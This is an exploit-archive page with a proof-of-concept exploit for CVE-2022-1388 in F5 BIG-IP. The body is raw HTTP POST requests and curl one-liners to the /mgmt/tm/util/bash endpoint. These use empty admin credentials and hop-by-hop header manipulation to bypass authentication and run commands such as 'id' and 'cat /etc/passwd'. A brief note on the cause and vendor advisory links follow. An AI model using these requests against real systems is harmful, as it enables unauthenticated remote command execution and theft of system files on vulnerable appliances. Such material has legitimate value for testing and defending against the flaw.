Home[1] Files[2] News[3] Contact[4] Add New[5]
- F5 BIG-IP Remote Code Execution[6]
- Authored by Alt3kx[7] | Site github.com[8]
-
F5 BIG-IP remote code execution proof of concept exploit that leverages the vulnerability identified in CVE-2022-1388.
- advisories | CVE-2022-1388[9]
- SHA-256 |
2c3224e25af9797e9d7139c7d759da88b2eae07b09d164c4bf3a7423cfb95c06
- Download[10] | Favorite[11] | View[12]
Change Mirror[13] Download[14]
# F5 BIG-IP RCE exploitation (CVE-2022-1388)
POST (1):
POST /mgmt/tm/util/bash HTTP/1.1
Host: <redacted>:8443
Authorization: Basic YWRtaW46
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: 0
{"command": "run" , "utilCmdArgs": " -c 'id' " }
curl commandliner:
$ curl -i -s -k -X $'POST'
-H $'Host: <redacted>:8443'
-H $'Authorization: Basic YWRtaW46'
-H $'Connection: keep-alive, X-F5-Auth-Token'
-H $'X-F5-Auth-Token: 0'
-H $'Content-Length: 52'
--data-binary $'{\"command\": \"run\" , \"utilCmdArgs\": \" -c \'id\' \" }\x0d\x0a'
$'https://<redacted>:8443/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080
POST (2):
POST /mgmt/tm/util/bash HTTP/1.1
Host: <redateced>:8443
Authorization: Basic YWRtaW46
Connection: keep-alive, X-F5-Auth-Token
X-F5-Auth-Token: 0
{"command": "run" , "utilCmdArgs": " -c ' cat /etc/passwd' " }
curl commandliner:
$ curl -i -s -k -X $'POST'
-H $'Host: <redacted>:8443'
-H $'Authorization: Basic YWRtaW46' -H $'Connection: keep-alive, X-F5-Auth-Token'
-H $'X-F5-Auth-Token: 0'
--data-binary $'{\"command\": \"run\" , \"utilCmdArgs\": \" -c \' cat /etc/passwd\' \" }\x0d\x0a\x0d\x0a'
$'https://<redacted>/mgmt/tm/util/bash' --proxy http://127.0.0.1:8080
Note:
Issue could be related between frontend and backend authentication "Jetty" with empty credentials "admin: <empty>"
+ value of headers ,see "HTTP hop_by_hop request headers"...
References and Fixes :
* https://support.f5.com/csp/article/K23605346
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
Here the documentation used latest nites:
* https://clouddocs.f5.com/api/icontrol-rest/
HTTP hop_by_hop request headers:
* https://portswigger.net/research/top-10-web-hacking-techniques-of-2019-nominations-open
# Author
Alex Hernandez aka @_alt3kx_
File Tags
- ActiveX[19] (932)
- Advisory[20] (77,275)
- Arbitrary[21] (15,065)
- BBS[22] (2,859)
- Bypass[23] (1,560)
- CGI[24] (1,010)
- Code Execution[25] (6,630)
- Conference[26] (668)
- Cracker[27] (797)
- CSRF[28] (3,268)
- DoS[29] (21,743)
- Encryption[30] (2,330)
- Exploit[31] (49,683)
- File Inclusion[32] (4,142)
- File Upload[33] (938)
- Firewall[34] (821)
- Info Disclosure[35] (2,542)
- Intrusion Detection[36] (850)
- Java[37] (2,781)
- JavaScript[38] (792)
- Kernel[39] (5,998)
- Local[40] (13,980)
- Magazine[41] (586)
- Overflow[42] (12,125)
- Perl[43] (1,410)
- PHP[44] (5,038)
- Proof of Concept[45] (2,277)
- Protocol[46] (3,291)
- Python[47] (1,389)
- Remote[48] (29,599)
- Root[49] (3,441)
- Ruby[50] (574)
- Scanner[51] (1,629)
- Security Tool[52] (7,675)
- Shell[53] (3,054)
- Shellcode[54] (1,201)
- Sniffer[55] (880)
- Spoof[56] (2,078)
- SQL Injection[57] (15,980)
- TCP[58] (2,350)
- Trojan[59] (672)
- UDP[60] (866)
- Virus[61] (659)
- Vulnerability[62] (30,371)
- Web[63] (8,983)
- Whitepaper[64] (3,710)
- x86[65] (942)
- XSS[66] (17,291)
- Other[67]
File Archives
- May 2022[68]
- April 2022[69]
- March 2022[70]
- February 2022[71]
- January 2022[72]
- December 2021[73]
- November 2021[74]
- October 2021[75]
- September 2021[76]
- August 2021[77]
- July 2021[78]
- June 2021[79]
- Older[80]
Systems
- AIX[81] (425)
- Apple[82] (1,875)
- BSD[83] (368)
- CentOS[84] (55)
- Cisco[85] (1,911)
- Debian[86] (5,948)
- Fedora[87] (1,690)
- FreeBSD[88] (1,241)
- Gentoo[89] (4,152)
- HPUX[90] (877)
- iOS[91] (317)
- iPhone[92] (108)
- IRIX[93] (220)
- Juniper[94] (67)
- Linux[95] (41,972)
- Mac OS X[96] (683)
- Mandriva[97] (3,105)
- NetBSD[98] (255)
- OpenBSD[99] (478)
- RedHat[100] (11,395)
- Slackware[101] (941)
- Solaris[102] (1,606)
- SUSE[103] (1,444)
- Ubuntu[104] (7,758)
- UNIX[105] (9,054)
- UnixWare[106] (184)
- Windows[107] (6,390)
- Other[108]
- Services
- Security Services[119]
- Hosting By
- Rokasec[120]